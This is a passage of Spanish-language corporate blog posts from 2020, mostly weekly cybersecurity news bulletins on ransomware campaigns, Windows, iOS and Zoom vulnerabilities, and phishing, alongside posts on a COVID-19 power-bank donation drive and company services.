Citrix, las zonas de almacenamiento creadas de forma previa con una versión vulnerable del controlador podrían ser explotadas aunque este se haya actualizado posteriormente. Información completa: https://support.citrix.com/article/CTX269106 Campaña de difusión del ransomware Snake Ha sido detectada una campaña de distribución del ransomware Snake (también conocido como Ekans) que habría dado comienzo esta misma semana y cuyo objetivo sería la infección de entornos corporativos en sectores y territorios diversos. Desde el lunes día 4 han sido reportadas más de 25 infecciones a través de la plataforma ID Ransomware que permite a los equipos IT identificar la familia de ransomware responsable de un ataque exitoso. Entre los afectados se encontraría la empresa alemana Fresenius, una de las entidades de asistencia sanitaria más grandes de Europa, junto a otras empresas no identificadas como una firma de arquitectura francesa o una compañía financiera de tarjetas prepago. Snake es una familia de ransomware relativamente nueva, identificada en enero de 2020, de la cual se habían visto hasta el momento muy pocas muestras e infecciones. Entre sus características más reseñables se encuentra la capacidad para deshabilitar determinados procesos asociados a sistemas SCADA e ICS, lo que permite situar el foco de las infecciones de Snake en el sector industrial. En esta nueva campaña, la nota de rescate incluye una línea adicional de texto donde se amenaza al usuario con la filtración de los datos robados si no se produce el pago del rescate en el tiempo estipulado, estrategia que ya es común en múltiples familias de ransomware desde finales de 2019. Esta entidad ha reconocido el ataque y ha informado de que sus actividades hospitalarias continúan aunque con limitaciones. Más información: https://www.bleepingcomputer.com/news/security/large-scale-snake-ransomware-campaign-targets-healthcare-more/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
8 de mayo de 2020
Iniciativa solidaria Covid-19: recargando IFEMA de energía para los enfermos
Las últimas semanas han sido muy complicadas para todos, llenas de noticias tristes y momentos difíciles, pero también ha habido hueco para iniciativas movidas por la solidaridad y muchas ganas de ayudar haciendo lo correcto. En este artículo recogemos, en primera persona, la iniciativa que lideramos para hacer llegar cargadores portátiles a los enfermos ingresados en el hospital del IFEMA de Madrid. Hace poco más de un mes, el pasado 24 de marzo, recibimos un escueto mensaje de WhatsApp de parte de "El Jefe": “¿Tenemos baterías externas de merchandising? En el hospital que han montado en IFEMA las necesitan para mantener a los enfermos conectados con sus familiares”. Lo cierto es que hace un par de años que no tenemos stock de powerbanks, pero en todos los eventos contamos con algún partner que dispone de ellas. Así que activamos los hilos de contactos, compañeros y colegas de profesión para ayudar en algo muy pequeño que tendría un retorno muy grande para los enfermos ingresados en IFEMA y también para sus familias: cargar sus teléfonos y poder comunicarse con los suyos aunque en sus camas no tuvieran enchufes. Conociendo el gran número de iniciativas en las que estaban colaborando nuestros compañeros (red, app de autodignóstico, fabricación de pantallas y un sinfín de proyectos más), teníamos que ser capaces de atender la necesidad que había llegado desde IFEMA. No íbamos a quedarnos parados así que nos lo tomamos como un objetivo más dentro del trabajo que todo el equipo está haciendo desde que comenzó el teletrabajo para nosotros, el pasado 11 de marzo. Trabajo en equipo contra el coronavirus Llamadas y un sinfín de mails a compañeros de las distintas áreas de Telefónica, a colegas de profesión, a partners… Un día más tarde estábamos recogiendo en Distrito T un centenar de baterías externas que cargamos una a una mientras teletrabajábamos desde nuestros domicilios. Cargábamos baterías y recibíamos llamadas: Solange, de Microsoft, nos decía que nos enviarían 300 unidades y que lo movería en un grupo de periodistas y agencias con los que tenía contacto frecuente. Rosana, de la Fundación SENER, preguntaba a dónde debía enviarlas. Algunos desconocidos, ahora con nombre y cara, respondían a nuestra llamada a través de LinkedIn y enviaban unidades a través de Glovo con notas emotivas que nos removían por dentro. En una semana teníamos más de 400 unidades disponibles, un trabajo en equipo “de libro”. Gestionamos el papeleo necesario para garantizar que el desplazamiento estuviera autorizado puesto que ya estábamos en “estado de alarma”. Tremenda la sensación de entrar en el pabellón de IFEMA y sentir el sincero agradecimiento de personas que de verdad se están dejando la piel en cuidar a los enfermos y garantizar que pasen esta situación atendidos y en las mejores condiciones posibles. En las semanas posteriores, hicimos de intermediarios entre IFEMA y algunos fabricantes que entregaron hasta 1000 unidades más. Durante las últimas semanas la demanda ha bajado, lo que significa que hemos ayudado a conectar a los enfermos y a los sanitarios con sus familiares. En cualquier caso, seguimos teniendo algunas en stock y están puestas a disposición de las administraciones públicas por si de nuevo resultaran necesarias, en las últimas semanas se han donado decenas a la organización Círculo de Orellana. Juntos llegamos más lejos Todo esto no podríamos haberlo conseguido solos, por eso queremos agradecer de todo corazón la ayuda proporcionada por todos los implicados, a destacar las empresas que han colaborado en la iniciativa: Telefónica, SENER y Fundación SENER, Microsoft, Coonic (agencia de comunicación de Hisense), Fresh 'N Rebel junto a Smart Comms, TP-Link o Cytomic, entre otros. Gracias a todos por formar parte de esta gran familia.
30 de abril de 2020
Noticias de Ciberseguridad: Boletín semanal 18-24 de abril
PoC para ejecución remota de código explotando SMBGhost Investigadores de Ricerca Security han conseguido desarrollar una prueba de concepto para explotar código de forma remota aprovechándose de la vulnerabilidad en Windows 10 conocida como SMBGhost. Se trata de una vulnerabilidad crítica en Microsoft Server Message Block 3.1.1. (SMBv3), identificada como CVE-2020-0796 y que cuenta con una valoración de 10 puntos en la escala CVSS v3.1. El fallo fue dado a conocer inicialmente a través de publicaciones de Cisco Talos y Fortinet, tardando Microsoft varios días en publicar la actualización que corregía el problema. Tan sólo unos días después de conocerse se detectaban picos de escaneos de dispositivos vulnerables, y si bien inicialmente las pruebas de concepto permitían, entre otras cosas, realizar ataques DoS bloqueando el sistema objetivo, ya en los últimos días del mes de marzo se hacía públicas pruebas de concepto que permitían realizar la elevación local de privilegios. Ahora, los investigadores han conseguido explotar de forma exitosa el fallo para ejecutar código de forma remota en el sistema vulnerable, de forma que la necesidad de parchear se ha vuelto más acuciante que nunca; si bien por el momento, los investigadores han decidido no hacer público el exploit. Más información: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html Detectadas nuevas vulnerabilidades 0-Day en iOS ZecOps ha reportado dos nuevas vulnerabilidades que se estarían utilizando para explotar la aplicación ‘Mail’ nativa de iOS que, dependiendo de la versión, no requeriría interacción del usuario. Actualmente, todas las versiones de iOS desde iOS 6 hasta la fecha, incluida la 13.4.1, están afectadas, si bien se espera que la versión 13.4.5 de iOS corrija el problema. El fallo principal se trata de un caso de desbordamiento de pila, mientras que la segunda vulnerabilidad sería de escritura fuera de límites (out-of-band write). La explotación de estas vulnerabilidades estaría destinada a lograr una ejecución remota de código, y se sospecha que aún podría haber una tercera vulnerabilidad que permitiera a los agentes amenaza hacerse con el control del dispositivo. Según la información conocida hasta el momento, la explotación parece producirse mediante un correo electrónico que sea capaz de consumir una cantidad elevada de RAM, como para conseguir una cantidad considerable de recursos. Estas vulnerabilidades se estaría empleando como parte de ataques dirigidos contra altos ejecutivos de empresas, habiéndose detectado ya ataques contra objetivos seleccionados en EE.UU. Japón, Alemania, Arabia Saudí e Israel y otras zonas de Europa. Se sospecha que estos ataques podrían ser obra de un agente amenaza vinculado a un estado. Más detalles: https://blog.zecops.com/vulnerabilities/youve-got-0-click-mail/ Cognizant víctima del ransomware Maze El viernes pasado, la multinacional de IT Cognizant sufrió un ciberataque por el ransomware Maze que provocó interrupciones en el servicio para algunos de sus clientes. Horas después, ya a fecha de sábado, la compañía envió correos de aviso a sus clientes, notificando la infección con Maze e incluyendo una lista provisional de Indicadores de Compromiso podía ser utilizada por los clientes para monitorizar sus sistemas. Este incidente podría tener consecuencias muchos más graves en los próximos días, ya que los operadores de Maze son conocidos por robar los archivos de sus víctimas antes de cifrarlos y, en caso de no recibir el pago por el secuestro, se publica la información en páginas web y foros creados para ello. El ataque a Cognizant se ha producido en el mismo fin de semana en el que se ha conocido un incidente de las mismas características contra la empresa de contabilidad MNP. Más: https://news.cognizant.com/2020-04-18-cognizant-security-update Explotación de vulnerabilidades para desplegar webshells La Agencia de Seguridad Nacional de los Estados Unidos (NSA) y la Dirección de Señales de Australia (ASD) han publicado un informe conjunto en el que se advierte de un aumento en la explotación de vulnerabilidades en servidores web por parte de agentes amenaza para desplegar webshells. Según la NSA, los atacantes estarían utilizando cada vez más las webshells en sus campañas para obtener acceso y persistencia en la red de las víctimas, así como ejecutar código arbitrario de forma remota, subir payloads y pivotar a otros dispositivos dentro de la red objetivo. La NSA y la ASD han enumerado múltiples vulnerabilidades que estarían siendo explotadas para obtener este fin, incluyendo Microsoft SharePoint (CVE-2019-0604), Citrix (CVE-2019-19781) o Microsoft Exchange Server (CVE-2020-0688). La NSA ha publicado un repositorio en GitHub con herramientas para detectar y bloquear estas amenazas. Todos los detalles: https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/ Google corrige un misterioso fallo crítico en Chrome Se ha publicado una actualización de Google Chrome que corrige un fallo crítico en el navegador para los sistemas operativos Windows, Mac y Linux. Se trata de una vulnerabilidad, identificada como CVE-2020-6457, de naturaleza desconocida, dado que Google ha optado por restringir toda información relacionada a este error hasta que la mayoría de usuarios hayan parcheado sus navegadores. En el comunicado público, la empresa apunta que se harán públicos estos detalles en unos días o semanas. Se recomienda actualizar Chrome a la versión 81.0.4044.113. Más: https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_15.html Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
24 de abril de 2020
Noticias de Ciberseguridad: Boletín semanal 4-17 de abril
ZOOM – Amenazas en la app de videovigilancia Durante estas últimas semanas han continuado publicándose noticias acerca de la aplicación de videoconferencia Zoom: Detectada base de datos con cuentas de Zoom en foros underground: según una reciente investigación llevada a cabo por la firma de ciberseguridad IntSights, se ha descubierto una base de datos en un foro underground que contendría más de 2.300 nombres de usuario, contraseñas, emails, claves de acceso y enlaces a las reuniones de cuentas de Zoom, muchas de estas de carácter corporativo. Además, dentro del foro, los investigadores descubrieron diferentes hilos donde se abordaba cómo acceder a estas videoconferencias. Una de las formas sugeridas hacía referencia al credential stuffing, el cual permite verificar la validez de las cuentas y recopilar otros datos adicionales, siendo sugerido para ello el uso de la herramienta de código abierto OpenBullet. Venta de exploits para vulnerabilidades 0-Day en Zoom: un grupo de ciberdelicuentes estaría vendiendo exploits para dos vulnerabilidades 0-Day en Zoom que permitirían espiar las llamadas de la víctima. Concretamente, uno de los fallos afectaría a Windows y el otro a OS X. Según las fuentes, el 0-Day para Windows se trata de una vulnerabilidad de ejecución remota que permitiría a los atacantes acceder a la aplicación, si bien sería necesario explotar un fallo previo para poder acceder a la máquina de la víctima y estar presente en la llamada. Por otro lado, en lo referente al fallo en MacOS, no se trataría de una vulnerabilidad de ejecución remota de código, por lo que se considera menos crítico que el anterior. Estos fallos estarían vendiéndose por cerca de 500.000 dólares debido al creciente interés que hay en esta herramienta recientemente. Difusión de malware mediante suplantación de la Inspección de Trabajo de la Seguridad Social Durante la mañana del martes 7 de abril, numerosas empresas españolas recibieron correos falsos que fingían proceder de la Inspección de Trabajo y la Seguridad Social y que informaban de la apertura de una denuncia laboral en su contra. Dichos correos se enviaban desde un dominio falseado sin relación alguna con la Seguridad Social e incluían un enlace que redirigía a los usuarios a una página falsa que suplantaba al Ministerio de Trabajo. Una vez en dicha página, los supuestos documentos que detallaban la denuncia incluían tres archivos maliciosos destinados a instalar y ejecutar una versión del malware Smoke Loader, que se ha utilizado en el pasado para el robo de credenciales, el minado de criptomoneda o la difusión ransomware, entre otros. La infraestructura y malware utilizado es similar a la utilizada en el mes de marzo para suplantar a la Agencia Tributaria. Además, tan solo unos días más tarde se alertaba desde la propia página de la Inspección de Trabajo y Seguridad Social de una nueva campaña de suplantación. Más información: https://maldita.es/malditobulo/2020/04/07/correo-inspeccion-trabajo-investigacion-empresa-ministerio/ Vulnerabilidades 0-Day de Firefox explotadas por cibercriminales El equipo de Mozilla ha parcheado dos vulnerabilidades críticas en la última versión de su navegador web Firefox que estarían siendo actualmente explotadas por agentes amenaza. Ambas vulnerabilidades (CVE-2020-6819 y CVE-2020-6820) son del tipo use-after-free (UAF) y podrían ser explotadas para ejecutar código en el equipo de la víctima. Según los investigadores, se habría detectado la explotación activa de estas vulnerabilidades mediante ataques dirigidos. Ambos fallos han sido parcheados en las versión 74.0.1 del navegador Firefox y 68.6.1 de Firefox ESR. Se recomienda actualizar a la última versión del navegador lo antes posible. Todos los detalles: https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/ Vulnerabilidad crítica en VMware vCenter Server VMware ha publicado una actualización de seguridad que corrige una vulnerabilidad crítica de exposición de información en el software VMware vCenter Server. Este fallo, CVE-2020-3952 (CVSSv3 10.0), afecta al servicio de directorio de VMware (vmdir) solo en instalaciones actualizadas y podría permitir a los atacantes con acceso a la red de una implementación vmdir, extraer información sensible y, según la CISA, tomar el control de los sistemas afectados. Las nuevas instalaciones de vCenter Server 6.7 no estarían afectadas. Desde VMware se ha recomendado actualizar vCenter Server a la versión 6.7u3f lo antes posible. Más info: https://www.vmware.com/security/advisories/VMSA-2020-0006.html Suplantación de Cisco WebEx Investigadores de Cofense han detectado una campaña de phishing que pretende obtener credenciales de acceso a Cisco WebEx de los usuarios. Los agentes amenaza estarían enviando correos fraudulentos suplantando a Cisco, donde alertan de la existencia de una vulnerabilidad crítica en Cisco CloudCenter. El correo tiene asuntos como Critical Update o Alert! y tratan de suplantar la dirección de correo meetings@webex[.]com. Incluye referencias reales a una vulnerabilidad en dicho producto y se incita a los usuarios para que actualicen cuanto antes sus productos. Cuando los usuarios acceden al enlace que debería llevar a la supuesta página de Cisco, son dirigidos a un phishing alojado en un dominio registrado en los últimos días y que guarda gran similitud con el legítimo. Una vez se accede al dominio ilegítimo, se solicita al usuario que introduzca las credenciales y, tras ello, es redirigido a la página legítima de Cisco, desde la que podrá descargar las actualizaciones sin ser consciente del robo de sus datos. Toda la información: https://cofense.com/new-phishing-campaign-spoofs-webex-target-remote-workers/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
17 de abril de 2020
ElevenPaths y Chronicle se unen para crear nuevos servicios avanzados de seguridad gestionada
ElevenPaths, la compañía de ciberseguridad de Telefónica, ha anunciado hoy una colaboración estratégica con Chronicle, la compañía de soluciones de ciberseguridad que forma parte de Google Cloud, con el objetivo de brindar servicios de análisis de seguridad gestionada más potentes y flexibles para empresas en Europa y América latina. El crecimiento constante de los datos de seguridad que generan la mayoría de las empresas, combinado con la escasez de profesionales de seguridad capacitados disponibles para contratar, ha provocado que cada vez más organizaciones apuesten por el modelo de servicios gestionados para operaciones de seguridad. Los proveedores de servicios de seguridad gestionada (MSSP) y las organizaciones de detección y respuesta gestionadas (MDR) pueden ofrecer una supervisión y respuesta a las amenazas más eficaz y de manera más económica, que con sus recursos internos. ElevenPaths como MSSP inteligente proporciona servicios tanto de MSS como de MDR para mejorar la seguridad de sus clientes corporativos. ElevenPaths y Chronicle están trabajando para integrar los servicios de análisis de seguridad de Chronicle en la oferta de seguridad gestionada de ElevenPaths. Los beneficios potenciales para los clientes de ElevenPaths incluyen: Detección mejorada de amenazas potenciales, gracias a las capacidades avanzadas de detección de malware y a la experiencia de nuestros equipos; Solución más rápida de problemas de alertas de seguridad, gracias a la capacidad de Chronicle para analizar la telemetría a la velocidad de búsqueda; Investigación más efectiva de incidentes, basada en una mayor retención de la telemetría de seguridad. Las dos compañías tienen previsto desarrollar nuevas ofertas conjuntas para su lanzamiento a lo largo de este año. “En un entorno de datos de seguridad masivos y teniendo en cuenta la escasez de expertos en seguridad, los servicios MDR de ElevenPaths permiten a nuestros clientes tener capacidades avanzadas de monitorización, detección, búsqueda caza de amenazas y respuesta a través de nuestro i-SOC”, ha señalado Alberto Sempere, director de producto y comercialización de ElevenPaths. "Usar la solución de Chronicle para procesar el gran volumen de telemetría de seguridad que genera una empresa moderna permitirá a nuestro equipo de MDR investigar y corregir la respuesta de forma más rápida, reforzando así la ciber-resiliencia de nuestros clientes". "La capacidad de Chronicle de retener petabytes de datos empresariales durante largos períodos de tiempo y ponerlos a disposición de los analistas de seguridad en menos de un segundo ayuda a nuestros socios a proteger mejor a sus propios clientes", recalcó Enrico Risi, director de ventas de Google Cloud Security de EMEA . "La integración de nuestra capacidad para vincular eventos de seguridad con las fortalezas de manejo de datos de ElevenPaths proporcionará a las empresas nuevas y poderosas herramientas para combatir el cibercrimen". La ciberseguridad es uno de los servicios digitales que ofrece Telefónica que ha sido recientemente integrado, junto a los de cloud e IoT/Big Data, en Telefónica Tech, una nueva unidad que aglutina estos tres negocios con alto potencial de crecimiento y con los que quiere acompañar a sus clientes en su transformación digital. Nota de prensa disponible aquí:
15 de abril de 2020
Conexión Segura, bloqueando ataques antes de que lleguen a tu dispositivo
Durante las últimas semanas estamos viendo cómo diferentes fraudes y ciberataques amenazan la seguridad de nuestras conexiones, por lo que desde nuestro servicio Conexión Segura están trabajando a pleno rendimiento para bloquear todo el contenido malicioso antes de que infecte nuestros dispositivos. Resulta especialmente importante saber cómo detectar y protegerse de ataques de phishing en tiempos de coronavirus y no caer en fake news y demás ciberamenazas. Para ello, nuestros expertos del SCC han preparado esta guía de riesgos y recomendaciones en ciberseguridad. Por su parte, las empresas también se están enfrentando a un auténtico desafío, ya que muchas se han visto obligadas a optar por el teletrabajo, para lo que recomendamos seguir los 10 tips para un teletrabajo seguro que han preparado nuestros CSAs, así como este podcast presentado por Diego Espitia. Pero, ¿cómo se traducen estos nuevos ciberataques en la realidad del usuario? ¿Aguantará la red? ¿Qué se está haciendo para protegernos? ¿Ha llegado la pandemia al mundo virtual? Para contestar a estas preguntas, expondremos varios datos de nuestro servicio Conexión Segura, lanzado en España y Argentina, con más de un millón de usuarios que ya disfrutan de un escudo de protección ahora más esencial para nuestra seguridad digital. Impacto del Covid-19 en el servicio de Conexión segura Los datos más relevantes desde que comenzó esta pandemia son los siguientes: Se registran bloqueos relacionados con el Covid-19 a partir del 1 de febrero El 13 de febrero comienza a ser significativo el número de bloqueos El mayor pico de bloqueos se registra durante los días 15 y 16 de marzo, siendo el día 15 el más destacado, el día de inicio de la alerta sanitaria Dominios relacionados con coronavirus Estos dominios han mostrado actividad maliciosa en algún momento del periodo considerado y han sido bloqueados por el servicio, pudiendo continuar estando activos, pero ya sin contenido malicioso. Algo frecuente en este tipo de campañas de malware. Los 5 dominios maliciosos que más veces ha bloqueado el servicio Conexión Segura y con los que tienes que tener especial precaución son: Habiendo bloqueado durante este tiempo un total de 19.059 URLs con peligro que corresponden a 675 dominios y subdominios maliciosos únicos vinculados al Covid-19. Seguridad en tu red Para proteger tu red de todas estas amenazas y que puedas estar tranquilo, el servicio Conexión Segura te permite navegar libre de riesgos manteniendo tu privacidad. Este servicio bloquea automáticamente y de forma preventiva las amenazas de malware y fraude que puedas encontrarte al navegar por la red antes de que lleguen a tus dispositivos, funcionando como un antivirus en red. Medidas de seguridad para tus hijos La tecnología cada vez llega antes a nuestras vidas, formando parte de nuestro día a día así como un elemento más. En el caso de los más pequeños, prácticamente desde que nacen tienen relación con tablets. móviles, ordenadores y demás dispositivos conectados, siendo uno de los grupos más expuestos y a la vez más vulnerables. Para proteger la seguridad digital de tus hijos y ayudar en tu tranquilidad hemos presentado Qustodio, una herramienta para aumentar la seguridad y el bienestar digital de los menores.
6 de abril de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 30 de marzo-3 de abril
ZOOM – Amenazas en la app de videovigilancia Como consecuencia del confinamiento y las nuevas necesidades de comunicación está proliferando la descarga de nuevas aplicaciones de videoconferencia como Zoom, de forma que son varios los incidentes que se han relacionado con esta aplicación en los últimos días: Suplantación a través del registro de dominios: Investigadores de seguridad Check Point han detectado un incremento en el registro de dominios utilizando la palabra “Zoom”, alcanzando un total de 1.700 dominios registrados, al menos un 4% de estos últimos, han sido clasificados como maliciosos. Esto se estaría utilizando en campañas de phishing suplantando la identidad de la aplicación. Además, se han encontrado archivos ejecutables como "zoom-us-zoom _ ##########.Exe" en el que emplean la utilización del término de la marca, para ofuscar el malware InstallCore. Exposición de información: El pasado 26 de marzo, investigadores de Motherboard indicaron aspectos concernientes a la privacidad de los datos y la recolección de estos en la versión de la app iOS. Según el análisis, una vez se descargaba y se abría la aplicación, Zoom se conectaba a la API Graph de Facebook, lo que hacía que la red social recopilase detalles no necesarios del usuario. Este fallo ya ha sido corregido. Intrusión en videoconferencias: Numerosas reuniones llevadas a cabo a través de la plataforma de videoconferencia Zoom, se han visto irrumpidas por actores externos con mensajes racistas y amenazantes. Es el llamado “ZoomBombing” o “Zoom Raid”. Los motivos que están generando estos altercados son la compartición de las urls de las reuniones a través de las diferentes redes sociales o plataformas de compartición de contenido, no seguras. En estos días se ha dado a conocer en este sentido “zWarDial”, una herramienta automatizada permite buscar reuniones de Zoom abiertas, es decir, sin contraseña que impida el acceso a una reunión de terceros. Vulnerabilidades conocidas: El pasado 31 de marzo, el investigador de seguridad @_g0dmode descubría una nueva vulnerabilidad en la aplicación de Windows que implica una exposición de las credenciales de acceso y que reside en el chat de la aplicación, ya que las URLs que se envían se convierten automáticamente en hipervínculos para que los demás miembros puedan acceder. Por otro lado, el 1 de abril, el investigador Patrick Wardle descubría dos 0-day en la aplicación para macOS que permitirían a un atacante local, ganar acceso de forma persistente en el equipo de la víctima, permitiendo así la instalación de malware o spyware. Ya están corregidos. Todas estas vulnerabilidades ya han sido corregidas también. PoCs para vulnerabilidad en SMBv3 Se han publicado pruebas de concepto para lograr la elevación local de privilegios privilegios en Windows 10 aprovechando el fallo crítico (CVE-2020-0796 CVSS 10) de ejecución remota de código en el protocolo Microsoft Server Message Block 3.1.1 (SMBv3). Las PoCs publicadas en un primer momento permitían, entre otras cosas, realizar ataques DoS bloqueando el sistema objetivo. En estos últimos días se han publicado nuevas pruebas de concepto que permitían realizar la elevación local de privilegios y que podría llevar a los atacantes al paso previo a la ejecución remota de código en el sistema vulnerable. Para corregir esta vulnerabilidad se recomienda actualizar los servidores y endpoints a la última versión de Windows y, si es posible, bloquear el puerto 445 hasta que se desplieguen las actualizaciones correspondientes. Más información: https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/ Incidente de seguridad en Marriott La cadena hotelera Marriott ha confirmado un incidente de seguridad que afectaría a la aplicación empleada en sus hoteles para facilitar información a los huéspedes. El acceso ilegítimo a la información se habría realizado empleando las credenciales de acceso de dos empleados desde mediados de enero de 2020 hasta finales de febrero, cuando se detectó el incidente y se procedió a deshabilitar las credenciales. La información comprometida incluye detalles de contacto (nombre, dirección, correo y número de teléfono), información de la cuenta de fidelidad (no la contraseña), datos adicionales (empresa, género, día y mes de nacimiento), preferencias, asociaciones y afiliaciones relacionadas. Marriott confirma que no se han visto afectados en esta ocasión datos bancarios, contraseñas de cuentas ni documentos oficiales de identidad. Este no es el primer incidente que confirma la cadena, que ya en noviembre de 2018 se vio obligada a reconocer el compromiso de la información de más de 500 millones de usuarios que habían realizado reservas en hoteles Starwood. Toda los detalles: https://mysupport.marriott.com/ GoDaddy víctima de un ataque exitoso de spear-phishing La empresa de registro de dominios más grande del mundo, GoDaddy, fue víctima a principios de semana de una ataque de spear-phishing dirigido contra sus empleados de servicio al cliente que proporcionó al atacante la posibilidad de acceder y modificar los registros DNS de clientes del servicio. Entre sus clientes se encuentran páginas como el broker online "escrow.com" que en la madrugada del lunes y por un periodo de dos horas, perdió el control de su página web al apuntar ésta al servidor web de un tercero. El atacante cambió los registros DNS para que el dominio resolviese a una IP ubicada en Malasia (111[.]90[.]149[.]49), además de obtener certificados gratuitos de Let's Encrypt para el dominio suplantado. GoDaddy ha indicado que hay otros cinco clientes potencialmente afectados que ya habrían sido informados del incidente. Más información: https://krebsonsecurity.com/2020/03/phish-of-godaddy-employee-jeopardized-escrow-com-among-others/ Técnica de Phishing en Office 365 usando CSS Se ha descubierto una campaña de phishing que utiliza el buzón de voz de Office 365 para enviar correos maliciosos que pretenden exfiltrar datos o infectar con malware. Lo novedoso reside en el formato de los correos enviados, puesto que estos utilizan hojas de estilo de cascada (CSS) para invertir el texto en el código HTML del correo electrónico. Dado que el texto se envía en orden inverso, de derecha a izquierda, esto permite eludir los filtrados de las Secure Email Gateways (SEG), cuya función es diferenciar entre los correos electrónicos legítimos y los mensajes de phishing detectando cadenas de texto. El CSS invierte el texto una vez llega el correo a la bandeja, por lo que el usuario no encuentra ninguna incongruencia en el formato. Esta técnica resulta efectiva de cara a ayudar que los ataques de phishing pasen a través de los SEG tradicionales, que están diseñados para analizar únicamente los elementos HTML en claro sin renderizar el correo electrónico para conocer el contenido final que verá el usuario destinatario. Más detalles: https://www.bleepingcomputer.com/news/security/office-365-phishing-uses-css-tricks-to-bypass-email-gateways/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
3 de abril de 2020
¿Qué tipo de profesionales trabajan en el Security Operations Center (SOC)?
Desde nuestro Security Operations Center (SOC), ubicado en 12 sedes alrededor distintas alrededor del mundo, ofrecemos servicios de Prevención, Detección y Repuesta que nos permiten garantizar al seguridad de nuestros clientes, pero esto sólo es posible gracias a la labor que ejercen nuestros más de 400 profesionales. Esta labor se realiza 24 horas al día y 7 días a la semana, de forma que podamos proporcionar una atención constante y personalizada, para lo cual contamos con diferentes perfiles: Security Manager Interlocución con cliente Gestión end-to-end (de principio a fin) Gobierno de la seguridad Oficina Técnica Visión cliente Administración y soporte Monitorización de seguridad Analista Local Clasificación de información Contextualización en cliente Expertos en tecnología Coordinador del equipo 24x7 Cumplimiento de SLA (acuerdo de servicio cliente proveedor) Monitorización de KPI Generación de Sinergias Coordinador del Servicio Evolución del servicio Seguimiento de contratos Gestión de activos Si quieres saber más sobre nuestro SOC y cómo trabajamos en él, no te pierdas este interesante vídeo: Toda lo que necesitas saber sobre el Security Operations Center aquí:
2 de abril de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 23-27 de marzo
COVID-19 – Nueva campaña del malware Ginp en España El equipo de investigadores ha detectado una nueva campaña del troyano bancario Ginp, utilizado para robar credenciales bancarias de la víctima aprovechándose de la temática del COVID-19. El fraude consiste en que, mediante una notificación push, se intenta que la víctima acceda a una página web denominada Coronavirus Finder. Una vez que el usuario accede a esta, se le informa que 12 personas a su alrededor están infectadas por el virus, y se solicita un micropago para conocer su localización exacta. Si el usuario decide realizar el pago, la información es transmitida a actores maliciosos obteniendo las credenciales bancarias. El equipo indica que la mayoría de los usuarios afectados por el malware Ginp se encuentran en España, aunque señalan que la etiqueta utilizada en esta campaña "flash-2" difiere de versiones anteriores "flash-es12", lo que podría significar que, al eliminar “es”, podrían planear expandir esta campaña a otros países. COVID-19 – Campaña con ransomware NetWalker y Ryuk contra el sector sanitario José Ángel González, Director Adjunto Operativo de la Policía Nacional, alertaba el pasado lunes sobre una campaña de ransomware que estaría difundiéndose mediante correos electrónicos al personal sanitario con el objetivo de afectar a los sistemas de centros hospitalarios. Bernardo Quintero, creador del motor VirusTotal, señalaba horas más tarde acerca de las declaraciones, que no se trataba de una campaña contra hospitales en nuestro país, sino que los correos recibidos se engloban dentro de una campaña a nivel internacional de distribución del ransomware NetWalker, el cual se propaga mediante un mail con un archivo adjunto nombrado “CORONAVIRUS_COVID-19.vbs”. Los indicadores de compromiso detectados en esta campaña, coincidían además con los reportados el pasado día 21 de marzo desde el equipo de seguridad de MalwareHunterTeam, quienes ya habían detectado la distribución de NetWalker en correos sobre la temática del COVID-19. Unos días más tarde, investigadores de seguridad alertaban también de la actividad de los gestores del ransomware Ryuk contra hospitales. Al contrario que otros operadores de ransomware como Maze o DoppelPaymer, que afirmaron paralizar sus ataques contra centros hospitalarios durante la pandemia, los operadores de Ryuk han continuado teniendo a este tipo organismos en su centro de mira. A lo largo de marzo, Ryuk ha dirigido sus ataques contra al menos 10 entidades dedicadas al sector salud en Estados Unidos; habiendo podido también localizarse varias muestras del ransomware inspiradas en la temática COVID-19, con nombres de archivo como "Protection of Department of Health". Campaña internacional de APT41 Investigadores de FireEye han descrito lo que podría ser una de las campañas de ciberespionaje más extensas de los últimos años llevada a cabo por el actor chino APT41. Desde finales de enero hasta mediados de marzo, los investigadores identificaron ataques a 75 compañías mediante el aprovechamiento de vulnerabilidades recientes en routers Cisco (RV320), Citrix NetScanler/ADC (CVE-2019-19781) y Zoho ManageEngine (CVE-2020-10189). El sector y localización territorial de las entidades afectadas es muy amplio, sin haberse llegado a determinar si la campaña pretende una explotación masiva o responde a objetivos dirigidos. Un compromiso exitoso continúa con la descarga de malware libre como Cobalt Strike o Meterpreter, en espera de realizar tareas de reconocimiento interno antes de desplegar malware más sofisticado. Cabe señalar que, en anteriores campañas más limitadas, APT41 también ha aprovechado la vulnerabilidad CVE-2019-3396 en Atlassian Confluence. Información completa aquí: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html Explotación de vulnerabilidades 0-Day de Microsoft Microsoft emitió un aviso de seguridad para dos vulnerabilidades 0-Day críticas de Windows sin parchear que actualmente están siendo explotadas mediante la ejecución de código arbitrario de forma remota. En concreto, se 